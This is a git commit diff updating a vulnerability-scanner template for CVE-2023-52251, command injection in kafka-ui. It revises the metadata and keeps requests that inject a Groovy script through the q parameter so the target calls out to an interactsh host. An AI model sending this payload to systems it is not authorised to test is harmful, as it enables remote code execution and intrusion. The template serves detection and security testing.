Update CVE-2023-52251.yaml

2024-03-14 15:48:27 +05:30 · 2024-03-14 15:48:27 +05:30 · 55b1e930ef
parent 456ed4ec41
commit 55b1e930ef
1 changed files with 20 additions and 13 deletions
--- a/http/cves/2023/CVE-2023-52251.yaml
+++ b/http/cves/2023/CVE-2023-52251.yaml
@ -1,25 +1,32 @@
 id: CVE-2023-52251

 info:
-  name: kafka-ui - RCE
+  name: Kafka UI 0.7.1 Command Injection
  author: yhy0
-  severity: critical
+  severity: high
  description: |
-    Remote Code Execution vulnerability provectus/kafka-ui.
-  remediation: |
-    Do not expose to the Internet
+    An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
  reference:
    - https://github.com/BobTheShoplifter/CVE-2023-52251-POC
    - https://github.com/provectus/kafka-ui
+    - http://packetstormsecurity.com/files/177214/Kafka-UI-0.7.1-Command-Injection.html
+    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-52251
+    cwe-id: CWE-94
+    epss-score: 0.02881
+    epss-percentile: 0.90497
+    cpe: cpe:2.3:a:provectus:ui:*:*:*:*:*:kafka:*:*
  metadata:
-    max-request: 3
-    fofa-query: icon_hash="-1477045616"
    verified: true
-  tags: cve,cve2023,rce,kafka,kafka-ui
+    max-request: 3
+    vendor: provectus
+    product: ui
+    framework: kafka
+    fofa-query: icon_hash="-1477045616"
+  tags: packetstorm,cve,cve2023,rce,kafka,kafka-ui

 http:
  - method: GET
@ -27,7 +34,7 @@ http:
      - "{{BaseURL}}/api/clusters"
      - "{{BaseURL}}/api/clusters/{{cluster}}/topics?showInternal=true&search=&orderBy=NAME&sortOrder=ASC"
      - "{{BaseURL}}/api/clusters/{{cluster}}/topics/{{topic}}/messages?q=new%20URL%28%22http%3A%2F%2F{{interactsh-url}}%22%29.text&filterQueryType=GROOVY_SCRIPT&attempt=2&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING"
-    
+
    matchers-condition: and
    matchers:      
      - type: dsl
@ -36,19 +43,19 @@ http:
          - 'contains(body, "status\":\"online")'
          - 'status_code == 200'
        condition: and
-      
+
      - type: dsl
        dsl:
          - 'contains(content_type, "application/json")'
          - 'contains(body, "name")'
          - "status_code == 200"
        condition: and
-    
+
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
-          
+
    extractors:
      - type: json
        name: cluster